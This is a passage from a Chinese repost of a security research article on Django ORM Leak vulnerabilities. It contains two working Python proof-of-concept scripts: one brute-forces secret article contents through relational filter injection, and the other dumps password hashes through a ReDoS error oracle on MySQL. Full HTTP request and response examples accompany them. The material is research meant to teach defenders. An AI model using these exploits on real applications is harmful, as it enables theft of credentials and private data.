f"{base_payload}__{column_to_leak}__startswith": test_substring_value,
f"{base_payload}__id": id
}
r_json = send_payload(payload)
return len(r_json) > 0, test_substring_value
def get_secret_article_ids(base_payload: str, max_ids: int = 10) -> list[int]:
ids = []
for id in range(max_ids):
payload = {
f"{base_payload}__id": id,
f"{base_payload}__is_secret": int(True)
}
r_json = send_payload(payload)
if len(r_json) > 0:
ids.append(id)
return ids
def exploit(base_payload: str, id: int, column_to_leak: str):
chars = CHARS[column_to_leak]
dumped_value = ""
print(f"r{Fore.GREEN}article id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = []
for test_char in chars:
# Using startswith operator so only add test char to end
job_suffix = executor.submit(worker, base_payload, id, column_to_leak, dumped_value + test_char)
futures.append(job_suffix)
future: Future
for future in futures:
result = future.result()
was_success = result[0]
test_substring = result[1]
print(f"r{Fore.GREEN}article id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{test_substring}{Style.RESET_ALL}", end="")
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
executor.shutdown(wait=False, cancel_futures=True)
break
if not found:
break
print(f"r{Fore.GREEN}article id: {Fore.CYAN}{Style.BRIGHT}{id}{Style.RESET_ALL} {Fore.GREEN}dumped {column_to_leak}: {Fore.CYAN}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
def main():
base_payload = "categories__articles"
try:
article_ids = get_secret_article_ids(base_payload)
except requests.exceptions.ReadTimeout as e:
print(f"{Fore.RED}{Style.BRIGHT}base payload has too many m2m loop backs and is now dosing the server{Style.RESET_ALL}")
return
for article_id in article_ids:
print(f"{Fore.GREEN}{Style.BRIGHT}Found secret article with id: {article_id}{Style.RESET_ALL}")
exploit(base_payload, article_id, "title")
exploit(base_payload, article_id, "body")
if __name__ == "__main__":
main()
通过 REDOS 负载进行基于错误的泄漏
我在本文中讨论的所有先前的漏洞利用方法都依赖于一件事,那就是使用响应长度变化作为预言来确定我们何时猜出了下一个正确的字符。可能存在这样一种情况,即 Django 代码容易受到 ORM 泄漏的影响,但内容长度不会根据查询结果而变化。
例如,我编写了这个方法,如果执行期间引发异常,它将返回错误响应。
class ArticleErrorView(APIView):
"""
View for Articles
"""
def post(self, request: Request, format=None) -> Response:
"""
Query articles
"""
try:
# Just simulates doing some filtering without returning a result
_articles = list(Article.objects.filter(is_secret=False, **request.data))
except Exception as e:
return Response({"msg":"something goofed"}, status=500)
return Response({})
现在,如果我们能够Article.objects.filter根据查询导致 Django ORM 引发异常,那么我们就会有错误 oracle。
但你怎么能这样做呢?
好吧,我之前提到过,Django ORM 允许的操作符之一是regex操作符。使用用户提供的模式进行正则表达式匹配是危险的,并且可能会引入ReDoS 漏洞。为了减轻 ReDoS 攻击,MySQL(本例中使用的 DBMS)有一个默认的正则表达式时间限制,如果正则表达式模式匹配超出限制,则会引发超时异常。
regexp_time_limitMySQL 的默认值(以毫秒为单位)
mysql> SELECT @@GLOBAL.regexp_time_limit;
+----------------------------+
| @@GLOBAL.regexp_time_limit |
+----------------------------+
| 32 |
+----------------------------+
1 row in set (0.00 sec)
我们可以使用 ReDoS 有效负载触发此超时异常,该负载将用作我们的错误预言机。例如,如果我们按用户的密码哈希进行过滤,则以下 JSON 请求将成功返回。
*示例请求不会触发错误,因为密码哈希值不是以pbkdf1*
POST /api/articleserror/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 74
Content-Type: application/json
{"created_by__user__password__regex": "^(?=^pbkdf1).*.*.*.*.*.*.*.*!!!!$"}
由于未出现任何错误,因此上述示例的响应成功
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2024 06:58:00 GMT
Server: WSGIServer/0.2 CPython/3.10.12
Content-Type: application/json
Vary: Accept, Cookie
Allow: POST, OPTIONS
X-Frame-Options: DENY
Content-Length: 2
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
{}
但是,当我们过滤以pbkdf2它开头的密码哈希值时,它会与我们的 ReDoS 有效负载匹配,从而导致异常Timeout exceeded in regular expression match并返回错误响应。
将匹配密码哈希的开头并触发超时异常
POST /api/articleserror/ HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 75
Content-Type: application/json
{"created_by__user__password__regex": "^(?=^pbkdf2).*.*.*.*.*.*.*.*!!!!$"}
错误响应将是我们的预言,密码哈希确实以此开头pbkdf2
HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Jun 2024 07:03:33 GMT
Server: WSGIServer/0.2 CPython/3.10.12
Content-Type: application/json
Vary: Accept, Cookie
Allow: POST, OPTIONS
X-Frame-Options: DENY
Content-Length: 26
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Cross-Origin-Opener-Policy: same-origin
{"msg":"something goofed"}
因此让我们再次获得那个很酷的 PoC 脚本和 GIF。
import re, requests, string, sys
from colorama import Fore, Style
from concurrent.futures import ThreadPoolExecutor
TARGET = "http://127.0.0.1:8000/api/articleserror/"
CHARS = string.ascii_letters + string.digits + "$/=+_"
THREADS = 20
def get_regex_payload(test_string: str) -> str:
escaped_test = re.escape(test_string)
return f"^(?=^{escaped_test}).*.*.*.*.*.*.*.*!!!!$"
def worker(test_substring_value: str) -> tuple[bool, str]:
r = requests.post(
TARGET,
json={
"created_by__user__password__regex": f"^(?=^{get_regex_payload(test_substring_value)}).*.*.*.*.*.*.*.*!!!!$"
}
)
# Simple check to see if a 500 response was returned
return r.status_code == 500, test_substring_value
def main():
dumped_value = ""
print(f"r{Fore.GREEN}regex payload: {Fore.BLUE}{Style.BRIGHT}{get_regex_payload(dumped_value)}{Style.RESET_ALL}", end="")
sys.stdout.flush()
while True:
found = False
with ThreadPoolExecutor(max_workers=THREADS) as executor:
futures = executor.map(worker, [dumped_value + test_char for test_char in CHARS])
for result in futures:
was_success = result[0]
test_substring = result[1]
print(
f"r{Fore.GREEN}regex payload: {Fore.BLUE}{Style.BRIGHT}{get_regex_payload(test_substring)}{Style.RESET_ALL}", end=""
)
sys.stdout.flush()
if was_success:
found = True
dumped_value = test_substring
break
if not found:
break
print()
print(f"r{Fore.RED}dumped password: {Fore.YELLOW}{Style.BRIGHT}{dumped_value} {Style.RESET_ALL}")
if __name__ == "__main__":
main()
关于基于错误的泄漏的一些注意事项
我在这里讨论的方法滥用了 MySQL 中的默认正则表达式超时,导致引发超时异常。只有当 Django 应用程序使用 MySQL 作为其 DBMS 时,此方法才会起作用。下面我列出了它可能不适用于其他一些流行的 SQL DBMS 的原因。
-
SQLite:默认情况下没有REGEXP定义运算符,需要在第三方扩展中加载。因此,本文不涉及这些扩展的探讨。
-
PostgreSQL:没有默认的正则表达式超时,并使用不易回溯的正则表达式引擎。
-
MariaDB:没有正则表达式超时。
-
它留给读者作为练习,以找出其他基于错误的攻击方法(如果您发现新方法,请随时与我联系)。
第一部分 结论
在本文中,我们定义了ORM 泄漏漏洞类别以及应用程序可能受到 ORM 泄漏漏洞影响的条件列表。它为未来关于 ORM 泄漏的研究奠定了坚实的基础,我期待看到其他人发现新的漏洞和攻击方法。
我们还详细介绍了关系过滤攻击如何利用进入 Django ORM 过滤方法的未经清理的用户输入,以及为什么在查询之前应始终将用户输入验证到严格的允许列表中。
请继续关注本系列的下一篇文章,我们将在其中演示如何使用本文未讨论的新攻击方法利用不同的 ORM 。
Part one of a series about ORM Leak vulnerabilities and attacking the Django ORM to leak sensitive data
https://www.elttam.com/blog/plormbing-your-django-orm/#content
原文始发于微信公众号(Ots安全):关于 ORM 泄漏漏洞和攻击 Django ORM 以泄漏敏感数据的系列文章的第一部分
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论